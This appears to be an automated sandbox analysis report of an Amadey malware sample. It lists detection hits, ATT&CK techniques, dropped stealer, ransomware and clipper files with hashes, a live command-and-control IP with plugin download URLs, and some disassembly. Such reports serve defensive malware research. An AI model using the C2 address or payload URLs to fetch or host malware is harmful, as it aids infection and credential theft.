                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                          Source: Yara match File source: dump.pcap, type: PCAP
                          Source: Yara match File source: 00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000002.827863468.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000003.581791427.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000002.827863468.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000003.581742963.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000003.581742963.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000002.827863468.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 20.2.rundll32.exe.6e7e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match File source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                          Valid Accounts | 3 Native API | 1 Windows Service | 2 Bypass User Access Control | 21 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 14 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
                          Default Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                          Domain Accounts | 1 Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                          Local Accounts | 1 Service Execution | 1 Services File Permissions Weakness | 111 Process Injection | 2 Software Packing | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 113 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                          Cloud Accounts | Cron | Network Logon Script | 1 Scheduled Task/Job | 1 Timestomp | LSA Secrets | 13 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                          Replication Through Removable Media | Launchd | Rc.common | 1 Registry Run Keys / Startup Folder | 2 Bypass User Access Control | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                          External Remote Services | Scheduled Task | Startup Items | 1 Services File Permissions Weakness | 1 Masquerading | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          System Owner/User Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                          Process Injection
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                          Services File Permissions Weakness
                          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                          Rundll32
                          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          [Behavior graph: ID 799407, Sample: file.exe, Startdate: 06/02/2023, Architecture: WINDOWS, Score: 100]

                          Source | Detection | Scanner | Label
                          file.exe | 67% | ReversingLabs | Win32.Trojan.Amadey
                          file.exe | 100% | Joe Sandbox ML |

                          Source | Detection | Scanner | Label
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll | 81% | ReversingLabs | Win32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 81% | ReversingLabs | Win32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe | 51% | ReversingLabs | Win32.Trojan.Tedy
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 81% | ReversingLabs | Win32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe | 39% | ReversingLabs | Win32.Ransomware.Stop
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 81% | ReversingLabs | Win32.Trojan.Amadey

                          No Antivirus matches
                          No Antivirus matches

                          Source | Detection | Scanner | Label
                          http://62.204.41.4/Gol478Ns/index.php | 0% | Avira URL Cloud | safe
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | 0% | Avira URL Cloud | safe
                          62.204.41.4/Gol478Ns/index.php | 0% | Avira URL Cloud | safe
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | 100% | Avira URL Cloud | malware
                          No contacted domains info
                          Name | Malicious | Antivirus Detection | Reputation
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | true | Avira URL Cloud: safe | unknown
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | true | Avira URL Cloud: malware | unknown
                          62.204.41.4/Gol478Ns/index.php | true | Avira URL Cloud: safe | low
                          http://62.204.41.4/Gol478Ns/index.php | true | Avira URL Cloud: safe | unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          62.204.41.4 | unknown | United Kingdom | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:799407
                          Start date and time:2023-02-06 14:14:23 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:23
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@34/14@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 41.3% (good quality ratio 39.6%)
                          • Quality average: 84.9%
                          • Quality standard deviation: 24.3%
                          HCA Information:
                          • Successful, ratio: 93%
                          • Number of executed functions: 100
                          • Number of non-executed functions: 138
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240s for rundll32
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          Time | Type | Description
                          14:16:28 | API Interceptor | 2034x Sleep call for process: mnolyk.exe modified
                          14:16:29 | Task Scheduler | Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          No context
                          No context
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):226
                                                        Entropy (8bit):5.354940450065058
                                                        Encrypted:false
                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                        MD5:B10E37251C5B495643F331DB2EEC3394
                                                        SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                        SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                        SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):321
                                                        Entropy (8bit):5.355221377978991
                                                        Encrypted:false
                                                        SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                        MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                        SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                        SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                        SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                        Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):91136
                                                        Entropy (8bit):6.3469756750979025
                                                        Encrypted:false
                                                        SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                        MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                        SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                        SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                        SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):241664
                                                        Entropy (8bit):6.368190069123744
                                                        Encrypted:false
                                                        SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                        MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                        SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                        SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                        SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):407040
                                                        Entropy (8bit):7.714763087804338
                                                        Encrypted:false
                                                        SSDEEP:6144:KDy+bnr+xp0yN90QEiO/jRSuIWQa8nyGmIm93oYobD29LhGCoUsSSQDcxwowWwYd:tMrly909/cpLXyGG934EhGCjvwYWwI/
                                                        MD5:014BF36C5CA48AF27042E0BAF0B6D951
                                                        SHA1:A65CF5FB7CEC3AAB71273A45DCC83B1CC64D9F3F
                                                        SHA-256:C4A0666A243C0AE022C6B06DFCCB8509CD48D879A89B02562296503B620BE701
                                                        SHA-512:9D05081C8CC65B3718E99DC0D05E28EA2BA75D11DD642F94ECA9CC636ABA20EE939D6B8C5BB43057F31554B600012FE8E8816FFCD976CF86D0ED57CFD4AF6998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 51%
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):241664
                                                        Entropy (8bit):6.368190069123744
                                                        Encrypted:false
                                                        SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                        MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                        SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                        SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                        SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):375808
                                                        Entropy (8bit):6.845143402184113
                                                        Encrypted:false
                                                        SSDEEP:6144:NSLLfo0ceBpdxPr/Wcfu7dm93PYobD29LhLCRxuk6o+ALq:NS/foGnxT/WH7k93ZEhLCHr2v
                                                        MD5:A00A64A5A243C8705D68786C6159E402
                                                        SHA1:B1321832BB1DA71B4BFF28E6E3E6749D815398FB
                                                        SHA-256:5D275427202F0DEF0FB46B5E470D56C7CA8999E8C866E4DA7408FB854762FF3D
                                                        SHA-512:A728E81288BD5C48F92BE9BCCADD918E93B8086E5483CD57CCED246B75246BE2B34D961A0788C9092F9A0333AEF28799D40AD6E51D5A92A93FE22480035CEF6A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11264
                                                        Entropy (8bit):4.97029807367379
                                                        Encrypted:false
                                                        SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                        MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                        SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                        SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                        SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):91136
                                                        Entropy (8bit):6.3469756750979025
                                                        Encrypted:false
                                                        SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                        MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                        SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                        SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                        SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 81%
                                                        Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):4.621829903792328
                                                        Encrypted:false
                                                        SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                        MD5:1B7C22A214949975556626D7217E9A39
                                                        SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                        SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                        SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                        Malicious:false
                                                        Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                        Process:C:\Windows\SysWOW64\cacls.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):15
                                                        Entropy (8bit):3.240223928941852
                                                        Encrypted:false
                                                        SSDEEP:3:o3F:o1
                                                        MD5:509B054634B6DE74F111C3E646BC80FD
                                                        SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                        SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                        SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                        Malicious:false
                                                        Preview:processed dir:
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.837619492816914
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:598528
                                                        MD5:61a8c6a50c4a2c2990e45bc223464333
                                                        SHA1:87334fa8b57e66c8193d9138f82f31caf2732d73
                                                        SHA256:fe010d21711adca99ed52b577c6bf8e2919f5e08f3ce65ce446f1a92f87a7e34
                                                        SHA512:e5aeba8ecaaeb0fd373d9ed77754d4cd925153f7dc962fe1374696d0f974b020ab61fd1eea0b2ccc963a1100a168a211c81b24c6c040bb243012b7e91c88f4cf
                                                        SSDEEP:12288:pMrdy90JSCGLgBWhJpLEyGG9JjNhGCPvCXWweSfH2S5:cyOWJpYMHNh7PvNwvuo
                                                        TLSH:79D4020BF7F84471E8B05BB058FB03D316357E51973882AA624B7C6A1DB32A4A53536B
                                                        Icon Hash:f8e0e4e8ecccc870
                                                        Entrypoint:0x406a60
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:10
                                                        OS Version Minor:0
                                                        File Version Major:10
                                                        File Version Minor:0
                                                        Subsystem Version Major:10
                                                        Subsystem Version Minor:0
                                                        Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                        Instruction
                                                        call 00007F7F11080B45h
                                                        jmp 00007F7F11080455h
                                                        push 00000058h
                                                        push 004072B8h
                                                        call 00007F7F11080BE7h
                                                        xor ebx, ebx
                                                        mov dword ptr [ebp-20h], ebx
                                                        lea eax, dword ptr [ebp-68h]
                                                        push eax
                                                        call dword ptr [0040A184h]
                                                        mov dword ptr [ebp-04h], ebx
                                                        mov eax, dword ptr fs:[00000018h]
                                                        mov esi, dword ptr [eax+04h]
                                                        mov edi, ebx
                                                        mov edx, 004088ACh
                                                        mov ecx, esi
                                                        xor eax, eax
                                                        lock cmpxchg dword ptr [edx], ecx
                                                        test eax, eax
                                                        je 00007F7F1108046Ah
                                                        cmp eax, esi
                                                        jne 00007F7F11080459h
                                                        xor esi, esi
                                                        inc esi
                                                        mov edi, esi
                                                        jmp 00007F7F11080462h
                                                        push 000003E8h
                                                        call dword ptr [0040A188h]
                                                        jmp 00007F7F11080429h
                                                        xor esi, esi
                                                        inc esi
                                                        cmp dword ptr [004088B0h], esi
                                                        jne 00007F7F1108045Ch
                                                        push 0000001Fh
                                                        call 00007F7F1108097Bh
                                                        pop ecx
                                                        jmp 00007F7F1108048Ch
                                                        cmp dword ptr [004088B0h], ebx
                                                        jne 00007F7F1108047Eh
                                                        mov dword ptr [004088B0h], esi
                                                        push 004010C4h
                                                        push 004010B8h
                                                        call 00007F7F110805A6h
                                                        pop ecx
                                                        pop ecx
                                                        test eax, eax
                                                        je 00007F7F11080469h
                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                        mov eax, 000000FFh
                                                        jmp 00007F7F11080589h
                                                        mov dword ptr [004081E4h], esi
                                                        cmp dword ptr [004088B0h], esi
                                                        jne 00007F7F1108046Dh
                                                        push 004010B4h
                                                        push 004010ACh
                                                        call 00007F7F11080B35h
                                                        pop ecx
                                                        pop ecx
                                                        mov dword ptr [000088B0h], 00000000h
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x89a60 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x96000 | 0x888 | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xc000 | 0x8a000 | 0x89c00 | False | 0.9323672867513612 | data | 7.877195907451372 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x96000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country
                                                        AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
                                                        RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
                                                        RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
                                                        RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
